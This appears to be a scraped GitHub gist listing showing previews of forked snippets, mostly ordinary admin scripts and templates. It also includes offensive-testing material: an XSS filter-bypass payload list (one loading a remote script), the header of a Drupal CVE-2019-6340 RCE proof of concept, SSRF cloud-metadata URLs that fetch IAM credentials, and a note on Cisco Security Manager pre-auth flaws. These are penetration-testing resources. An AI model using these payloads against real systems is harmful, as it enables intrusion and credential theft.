One Paragraph of project description goes here
These instructions will get you a copy of the project up and running on your local machine for development and testing purposes. See deployment for notes on how to deploy the project on a live system.
Magno Logan magnologan
magnologan
/ README-Template.md
Created
February 13, 2020 15:15
— forked from PurpleBooth/README-Template.md
A template to make good README.md
magnologan
/ copy_remote_files.py
Created
February 19, 2020 21:10
— forked from mariusavram91/copy_remote_files.py
Copy remote files to local with Python's Paramiko
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import os | |
| import paramiko | |
| paramiko.util.log_to_file('/tmp/paramiko.log') | |
| paramiko.util.load_host_keys(os.path.expanduser('~/.ssh/known_hosts')) | |
| host = 'local' | |
| port = 22 | |
| username = 'user' | |
| files = ['file1', 'file2', 'file3', 'file4'] |
magnologan
/ xxsfilterbypass.lst
Created
February 25, 2020 03:12
— forked from rvrsh3ll/xxsfilterbypass.lst
XSS Filter Bypass List
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> | |
| '';!--"<XSS>=&{()} | |
| 0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-" | |
| <script/src=data:,alert()> | |
| <marquee/onstart=alert()> | |
| <video/poster/onerror=alert()> | |
| <isindex/autofocus/onfocus=alert()> | |
| <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> | |
| <IMG SRC="javascript:alert('XSS');"> | |
| <IMG SRC=javascript:alert('XSS')> |
magnologan
/ cve-2019-6340.py
Created
February 27, 2020 18:39
— forked from leonjza/cve-2019-6340.py
CVE-2019-6340
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| # CVE-2019-6340 Drupal <= 8.6.9 REST services RCE PoC | |
| # 2019 @leonjza | |
| # Technical details for this exploit is available at: | |
| # https://www.drupal.org/sa-core-2019-003 | |
| # https://www.ambionics.io/blog/drupal8-rce | |
| # https://twitter.com/jcran/status/1099206271901798400 |
magnologan
/ copymysql.sh
Created
March 6, 2020 20:06
— forked from ecdundar/copymysql.sh
Copy MySQL Database One Server (Remote) To Another (Local) Server
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # copymysql.sh | |
| # GENERATED WITH USING ARTUR BODERA'S SCRIPT | |
| # Source script at: https://gist.github.com/2215200 | |
| MYSQLDUMP="/usr/bin/mysqldump" | |
| MYSQL="/usr/bin/mysql" |
magnologan
/ gist:910ea336f3c4e91c636934355b2b9ad9
Created
April 20, 2020 17:41
— forked from CristinaSolana/gist:1885435
Keeping a fork up to date
git clone [email protected]:YOUR-USERNAME/YOUR-FORKED-REPO.git
cd into/cloned/fork-repo
git remote add upstream git://github.com/ORIGINAL-DEV-USERNAME/REPO-YOU-FORKED-FROM.git
git fetch upstream
magnologan
/ vpc-fargate.yaml
Created
September 1, 2020 16:18
— forked from lizrice/vpc-fargate.yaml
Cloudformation template for setting up VPC and subnets for Fargate
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Usage: | |
| # aws cloudformation --region <region> create-stack --stack-name <stack name> --template-body file://vpc-fargate.yaml | |
| # This template will: | |
| # Create a VPC with: | |
| # 2 Public Subnets | |
| # 2 Private Subnets | |
| # An Internet Gateway (with routes to it for Public Subnets) | |
| # A NAT Gateway for outbound access (with routes from Private Subnets set to use it) | |
| # |
magnologan
/ cloud_metadata.txt
Created
November 16, 2020 23:30
— forked from BuffaloWill/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## IPv6 Tests | |
| http://[::ffff:169.254.169.254] | |
| http://[0:0:0:0:0:ffff:169.254.169.254] | |
| ## AWS | |
| # Amazon Web Services (No Header Required) | |
| # from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories | |
| http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy | |
| http://169.254.169.254/latest/user-data | |
| http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME] |
magnologan
/ CSM_pocs.md
Created
November 24, 2020 20:15
— forked from Frycos/CSM_pocs.md
Cisco Security Manager is an enterprise-class security management application that provides insight into and control of Cisco security and network devices. Cisco Security Manager offers comprehensive security management (configuration and event management) across a wide range of Cisco security appliances, including Cisco ASA Adaptive Security Appliances, Cisco IPS Series Sensor Appliances, Cisco Integrated Services Routers (ISRs), Cisco Firewall Services Modules (FWSMs), Cisco Catalyst, Cisco Switches and many more. Cisco Security Manager allows you to manage networks of all sizes efficiently-from small networks to large networks consisting of hundreds of devices.
Several pre-auth vulnerabilities were submitted to Cisco on 2020-07-13 and (according to Cisco) patched in version 4.22 on 2020-11-10. Release notes didn't state anything about the vulnerabilities, security advisories were not published. All payload are processed in the context of NT AUTHORITY\SYSTEM.
magnologan
/ Installing Kubernetes via kubeadm
Created
February 4, 2021 22:17
Installing Kubernetes via kubeadm - List of commands
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Master Node Commands: | |
| # Add the commands below to this script depending on your Linux distro | |
| vi install-kubeadm.sh | |
| # CentOS / RHEL | |
| cat <<EOF | sudo tee /etc/yum.repos.d/kubernetes.repo | |
| [kubernetes] | |
| name=Kubernetes | |
| baseurl=https://packages.cloud.google.com/yum/repos/kubernetes-el7-\$basearch |